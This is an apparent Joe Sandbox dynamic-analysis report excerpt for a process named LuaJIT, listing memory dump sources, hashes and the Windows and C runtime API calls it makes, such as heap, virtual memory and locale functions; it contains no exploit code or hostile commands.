                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: ;$n
                                                                                                                                                                        • API String ID: 0-2359131802
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2882679554-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                                                                                                                                        • Instruction ID: ca70219836ed25f7b99ebbc0109f82b6b48b6180839f8e7f32346d30b0b77eb4
                                                                                                                                                                        • Opcode Fuzzy Hash: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                                                                                                                                        • Instruction Fuzzy Hash: 94214933A08A4397DB61AF18D44037DF6A2EB84B90F980234E65D4B6D5DF3ED4009B15
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                        • Opcode ID: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                                                                                                                                        • Instruction ID: 167c6b8e70a5d69b246a1f543f38c16bf6e7951fdfd9384a2dfce275394f4e96
                                                                                                                                                                        • Opcode Fuzzy Hash: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                                                                                                                                        • Instruction Fuzzy Hash: 99214F32E06B819EEB11AFA4C8446ECB7B0EB44B0CFA44536D74D02B85DF39E545DB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                                                                                                                                        • Instruction ID: 5274edc1ab34e4fad34dbdb4e78ac1f75294c53f84b2679dcb744a0fa15ac93c
                                                                                                                                                                        • Opcode Fuzzy Hash: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A11C673A0F58251FA50BA109800BBDD2A0AF45B84FD40132EA6C57A86DF3EE401A729
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                                                                                                                                        • Instruction ID: 3b96a6402ff3365a4c3a8802c65d2964cb958382ddf38753ea5ec9fb3c3f1c9f
                                                                                                                                                                        • Opcode Fuzzy Hash: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E018672A0AB4150EA04AB529D01579D6E1BB85FE0F884632EE6C57BD9DE3DE0425318
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-0
                                                                                                                                                                        • Opcode ID: 780b0584eb1b015e06906ae28c91b89760f41660562197ec5489c976ab8378eb
                                                                                                                                                                        • Instruction ID: 30c692e9ada95cd6d14891adfc0761ce7dcb790c74d8ade15d250974ab57fa8c
                                                                                                                                                                        • Opcode Fuzzy Hash: 780b0584eb1b015e06906ae28c91b89760f41660562197ec5489c976ab8378eb
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E11D833908A969BD720EA04E04442EF761F7C5745F600135EB8D47B98CB7EE941EF08
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                                                                                                                                        • Instruction ID: a969076bcb63a089bb4f87b2a1c16f3975fce55b5379892ad330c1a0a88f53af
                                                                                                                                                                        • Opcode Fuzzy Hash: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                                                                                                                                        • Instruction Fuzzy Hash: 0B11C4B390A643A5EA05BF54D8406ACF760EF807A8FD44232E65D062D5DF7EF000EB26
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 6b95eac102df65bb9225ae6595800cc8afe0f5ca61e7e8ab3e37982ea9be704d
                                                                                                                                                                        • Instruction ID: 48d29e4f285121930b67dd5a3a23fc9c1e176fda0aef154e567a5acee8e1e358
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b95eac102df65bb9225ae6595800cc8afe0f5ca61e7e8ab3e37982ea9be704d
                                                                                                                                                                        • Instruction Fuzzy Hash: A601B593A0B54322FA147B659C11BBCD2405F45BBCFA40331E92D4A2D2CE7EF401A32A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF738B0AB79,?,?,?,00007FF738AFAF01,?,?,?,?,00007FF738B102A3), ref: 00007FF738B09271
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fread_nolock_invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2335118202-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,00007FF738A8AF20,?,?,?,?,00007FF738A8AABE), ref: 00007FF738A8AE07
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF738B0A9A0: GetLastError.KERNEL32(?,?,?,00007FF738B0CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3), ref: 00007FF738B0A9AF
                                                                                                                                                                          • Part of subcall function 00007FF738B0A9A0: SetLastError.KERNEL32(?,?,?,00007FF738B0CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3), ref: 00007FF738B0AA4D
                                                                                                                                                                        • TranslateName.LIBCMT ref: 00007FF738B1A0A9
                                                                                                                                                                        • TranslateName.LIBCMT ref: 00007FF738B1A0E4
                                                                                                                                                                        • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF738B0717C), ref: 00007FF738B1A129
                                                                                                                                                                        • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF738B0717C), ref: 00007FF738B1A151
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                        • API String ID: 2136749100-905460609
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3939093798-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 435049134-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1405656091-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::rsfun
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3764944385-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1443284424-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF738B12CA2
                                                                                                                                                                          • Part of subcall function 00007FF738B123E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B123F4
                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF738B12CB3
                                                                                                                                                                          • Part of subcall function 00007FF738B12380: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B12394
                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF738B12CC4
                                                                                                                                                                          • Part of subcall function 00007FF738B123B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B123C4
                                                                                                                                                                          • Part of subcall function 00007FF738B09294: HeapFree.KERNEL32(?,?,?,00007FF738B18C78,?,?,?,00007FF738B18FFB,?,?,00000019,00007FF738B196D0,?,?,?,00007FF738B19603), ref: 00007FF738B092AA
                                                                                                                                                                          • Part of subcall function 00007FF738B09294: GetLastError.KERNEL32(?,?,?,00007FF738B18C78,?,?,?,00007FF738B18FFB,?,?,00000019,00007FF738B196D0,?,?,?,00007FF738B19603), ref: 00007FF738B092BC
                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF738B12ED0), ref: 00007FF738B12CEB
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                        • String ID: ?
                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                        • Opcode ID: cf0eb1f6ca2243066e125b98a8636c984bae825e280b544a8dfa0c66d0da31ad
                                                                                                                                                                        • Instruction ID: 3111056fe071659bc986dfde161b5ffe5328d463c40361529c5962b9e5bc8c54
                                                                                                                                                                        • Opcode Fuzzy Hash: cf0eb1f6ca2243066e125b98a8636c984bae825e280b544a8dfa0c66d0da31ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 74910323F1865366EB20FF35840127AE752EB80BD4F944131EA8C4BAD5DF3ED442A75A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocaletry_get_function
                                                                                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                                                                                        • API String ID: 2200034068-2904428671
                                                                                                                                                                        • Opcode ID: cedeff604e51c5c39958de497cab3e5388dd21419572c7ffd9defd6c3c48ed15
                                                                                                                                                                        • Instruction ID: 0813b2ea1818b5f3e2647c82a13193012f2c6a670f8b669de6a31c565c2376f9
                                                                                                                                                                        • Opcode Fuzzy Hash: cedeff604e51c5c39958de497cab3e5388dd21419572c7ffd9defd6c3c48ed15
                                                                                                                                                                        • Instruction Fuzzy Hash: B901F922B08B87A1E710EB51B4404AAE360FF95BC0FD44035EE5C13B59CF3ED901979A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                                        • Opcode ID: e43a0246ca48c036b89a1bc6ecf8a36f86f99c51f42af5f9ead38ad86180ded0
                                                                                                                                                                        • Instruction ID: 29760e7bb63ad651c30eef6eb4885f1d1560c7f19bb11e1fb48ba7901b2a9e23
                                                                                                                                                                        • Opcode Fuzzy Hash: e43a0246ca48c036b89a1bc6ecf8a36f86f99c51f42af5f9ead38ad86180ded0
